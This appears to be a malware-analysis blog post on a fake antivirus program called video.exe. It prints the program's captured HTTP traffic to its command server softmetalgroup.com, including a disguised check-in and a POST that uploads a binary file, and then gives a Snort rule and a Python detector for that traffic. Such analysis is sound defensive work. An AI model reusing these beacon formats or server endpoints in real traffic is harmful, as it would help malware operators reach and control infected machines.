video.exe is a fake AV malware. It resolves softmetalgroup.com (195.88.190.54) and does a GET for "/check". The server answers with a "200 OK" status, but the body it returns is a "404 Not Found" page:
GET /check HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: softmetalgroup.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Fri, 05 Mar 2010 23:10:38 GMT
Content-Type: application/octet-stream
Content-Length: 208
Last-Modified: Fri, 16 Oct 2009 15:35:48 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /check was not found on this server.</p>
<hr>
</body></html>
This is part of the check-in process: it doesn't match a proper 404 from nginx, as we'll see later.
A POST comes next that pushes a binary file:
POST /loads2.php?r=56.1 HTTP/1.1
Content-Type: multipart/form-data; boundary= 82859F64871E
User-Agent: Microsoft Internet Explorer
Host: softmetalgroup.com
Content-Length: 351
Connection: Keep-Alive

--82859F64871E
Content-Disposition: form-data; name="file"; filename="afile"
Content-Transfer-Encoding: binary
Content-Type: application/octet-stream
...
--82859F64871E--

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Fri, 05 Mar 2010 23:10:39 GMT
Content-Type: text/html; charset=windows-1252
Transfer-Encoding: chunked
Keep-Alive: timeout=20
X-Powered-By: PHP/5.3.1

2
OK
0
I base my signature on this request: the filename, the parameter name and the User-Agent:
alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"video.exe malware"; flow:to_server; content:"POST"; http_method; uricontent:"/loads2.php?r="; content:"User-Agent\: Microsoft Internet Explorer|0D 0A|"; sid:0305201001;)
Next, there are multiple GETs for "/omni.gif". The User-Agent switches to something that looks more legitimate, and proper 404 errors are returned:
GET http://softmetalgroup.com/omni.gif HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: softmetalgroup.com
Connection: close

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Fri, 05 Mar 2010 23:12:21 GMT
Content-Type: text/html; charset=windows-1252
Content-Length: 529
Connection: close

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.64</center>
</body>
</html>
<!-- The padding to disable MSIE's friendly error page -->
...
I'm not sure if these are keep-alive requests or not.
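To show how the two 404 pages and the POST beacon can be told apart in captured traffic, here is an added Python example (not from the original post) that checks raw HTTP messages for the two indicators above: a 200 OK whose body is a 404 page served as application/octet-stream, and a POST to /loads2.php?r= carrying the bare "Microsoft Internet Explorer" User-Agent, mirroring the Snort rule. The sample messages are constructed from the captures above, with bodies abbreviated.

```python
# Constructed samples reproducing the captures above (bodies abbreviated).
FAKE_404 = (
    "HTTP/1.1 200 OK\r\nServer: nginx/0.7.64\r\n"
    "Content-Type: application/octet-stream\r\nContent-Length: 208\r\n\r\n"
    "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n"
    "<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n"
    "<p>The requested URL /check was not found on this server.</p>\n<hr>\n</body></html>"
)
REAL_404 = (
    "HTTP/1.1 404 Not Found\r\nServer: nginx/0.7.64\r\n"
    "Content-Type: text/html; charset=windows-1252\r\nContent-Length: 529\r\n\r\n"
    "<html>\n<head><title>404 Not Found</title></head>\n<body bgcolor=\"white\">\n"
    "<center><h1>404 Not Found</h1></center>\n<hr><center>nginx/0.7.64</center>\n</body>\n</html>\n"
)
BEACON = (
    "POST /loads2.php?r=56.1 HTTP/1.1\r\n"
    "Content-Type: multipart/form-data; boundary= 82859F64871E\r\n"
    "User-Agent: Microsoft Internet Explorer\r\nHost: softmetalgroup.com\r\n"
    "Content-Length: 351\r\nConnection: Keep-Alive\r\n\r\n"
)


def parse_http(raw):
    """Split a raw HTTP message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def is_fake_404_checkin(raw):
    """True when the status is 200 but the body is a 404 page sent as octet-stream,
    i.e. the /check response; a genuine nginx 404 carries a 404 status and text/html."""
    start, headers, body = parse_http(raw)
    status_ok = start.split()[1] == "200"
    looks_404 = "<title>404 Not Found</title>" in body
    odd_type = headers.get("content-type", "").startswith("application/octet-stream")
    return status_ok and looks_404 and odd_type


def is_loads2_beacon(raw):
    """True for a POST to /loads2.php?r=... with the bare MSIE User-Agent (same
    conditions as the Snort rule above: method, URI prefix and User-Agent header)."""
    start, headers, _ = parse_http(raw)
    method, uri = start.split()[:2]
    return (method == "POST" and uri.startswith("/loads2.php?r=")
            and headers.get("user-agent") == "Microsoft Internet Explorer")
```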
Virustotal
ThreatExpert
mwanalysis
Emerging Threats signature here.